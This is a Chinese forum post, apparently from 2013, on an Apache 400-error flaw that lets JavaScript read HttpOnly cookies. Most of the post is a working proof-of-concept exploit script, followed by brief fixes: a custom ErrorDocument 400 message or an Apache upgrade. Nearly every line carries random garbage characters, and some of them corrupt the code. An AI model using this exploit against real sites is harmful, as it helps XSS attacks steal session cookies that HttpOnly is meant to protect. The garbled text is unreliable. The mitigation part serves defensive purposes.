很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
) I! a2 J2 F5 ^) p( G% s
# b7 y2 n. }- p# }; Z; h用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
' |+ x1 q2 R Y [8 q* _6 b0 I - A s0 ~& A! a0 z' W* q
! H4 W0 B7 x/ @! D* K7 H' s! S" n// http://www.exploit-db.com/exploits/18442/
* _( F8 p% K- A2 Q D/ j9 V( h4 mfunction setCookies (good) {; e, X4 j4 S! Z( R( T
// Construct string for cookie value- J4 A0 S6 ]! C$ ~5 V4 r* p9 d3 m
var str = "";* m J$ C6 I1 s! f2 v/ |$ u. J
for (var i=0; i< 819; i++) {
0 j4 G# }+ P, P! I# Lstr += "x";/ N, T% |- d: O7 D4 `
}
, _4 E+ D# m' O; f" X. m* `/ z/ n// Set cookies
3 I7 z: S1 M; n0 _for (i = 0; i < 10; i++) {
( H( [4 c) @: ~0 x; ]// Expire evil cookie
6 q' ]& o2 m+ B: W# wif (good) {
* E! C: T, O( D( C# \var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";3 `, @& p" G% y5 G+ m: b2 t7 s
}
' M4 m1 i; q5 ?" V// Set evil cookie
2 w9 U, a3 }2 j( c7 {$ relse {. R* o6 r A- A, k. Z m
var cookie = "xss"+i+"="+str+";path=/";
3 `, x5 ^8 ~( d! N4 z}
3 |9 {! c( B/ v, Wdocument.cookie = cookie;* W2 n! P- t5 Y
}0 W; s# P5 M" f; P3 n
}; Y. D5 f% A( j7 S0 \0 U
function makeRequest() {5 F* p/ [# S. C6 @/ b& f
setCookies();/ y: z% L3 p$ n. {$ |) s
function parseCookies () {
4 ?; _# V# K% o( \var cookie_dict = {};
6 N8 r0 u$ b4 f' o, X; s// Only react on 400 status
5 w0 t0 U& d2 t; W8 qif (xhr.readyState === 4 && xhr.status === 400) {# c- g& h, T5 \- k1 b" X
// Replace newlines and match <pre> content. k' |0 D' i& D
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
7 C! Z9 `3 m: j0 l" W: ~( rif (content.length) {
% @8 {' q- y% X// Remove Cookie: prefix$ a9 p6 k7 i2 S5 h3 Z
content = content[1].replace("Cookie: ", "");
2 s' `6 d5 b( A+ lvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);8 m) U5 C1 U; P
// Add cookies to object3 j0 v6 e* h( x- W
for (var i=0; i<cookies.length; i++) {
2 N! t6 P. k) y4 u- G, ivar s_c = cookies.split('=',2);0 e; ^& |' A5 l& |, I5 M4 r0 @) l) D
cookie_dict[s_c[0]] = s_c[1];. L' F1 p+ l. g9 H- K$ S% U, [' i% _
}
% e c; P0 T* S0 O}' ^$ \. d9 B6 H6 f2 p: x- ^: @
// Unset malicious cookies
/ M5 H8 s2 J2 u. x) j" ?* ]setCookies(true);
9 d8 q7 J' d" t1 r4 Galert(JSON.stringify(cookie_dict));0 T6 y% D; G9 ]4 w2 Z2 f
}! ]2 a/ e, C7 q. w4 l n' s
}" L! Z7 h" c4 U" \0 a1 A
// Make XHR request5 i( I; b" F/ r( Z/ A
var xhr = new XMLHttpRequest();
# t0 ?& C( G) s) L; Fxhr.onreadystatechange = parseCookies;) f4 K. h5 @+ u! l3 O
xhr.open("GET", "/", true); b6 r ]- f! ^2 N3 H3 y9 d; E
xhr.send(null);
6 R9 Y N$ i9 m8 N) g}. _- O$ W7 I& \6 [
makeRequest();
6 P6 _ Q% E, c7 x% h: A: n' L/ H7 o# q* T
你就能看见华丽丽的400错误包含着cookie信息。7 }6 E; ?2 R7 z& Z2 ?, ?
& J! @ j0 H6 G/ l下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#9 B( }( x8 z$ i4 \& r8 Z* o( z
0 A# T0 x1 y2 ^1 c: E2 S* m修复方案:
! H9 |( g, \( Q6 n! K* ?, d5 K8 b C0 q' Z* b
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下" g! j0 `) F7 o- a8 j3 A/ `* @! |
$ r2 I; `, `! ]% R \In the event of a problem or error, Apachecan be configured to do one of four things,* s( K8 p& ?& d& H6 ^/ C c# C
, Y, N+ O4 Q5 @+ }" h1. output asimple hardcoded error message输出一个简单生硬的错误代码信息* w3 Y( s) N: W2 y0 O" {
2. output acustomized message输出一段信息
# R6 b7 C3 X& R0 P/ `3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 5 _: ^1 O" M& M$ \
4. redirect to an external URL to handle theproblem/error转向一个外部URL
% P" r ~& f, k8 y/ v2 N6 ?& _" o5 p: h& s; C5 D
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
; e. P- }6 x, g [/ ?) [4 ]4 g$ D- B
Apache配置:
7 I% H0 S3 p1 s3 z9 \8 K3 p. d" Z- N% h
ErrorDocument400 " security test"
$ B" i& _- l" F9 ^( }0 S, u) k5 J$ S! P
当然,升级apache到最新也可:)。
6 d- Y1 M- P9 w }7 T& T& Y8 ~! b
参考:http://httpd.apache.org/security/vulnerabilities_22.html- ^& Q, ?7 N/ _1 s0 J# o. O
5 x% m6 D, \! b3 s4 X |
发表于 2013-4-19 19:15:43
收藏
支持
反对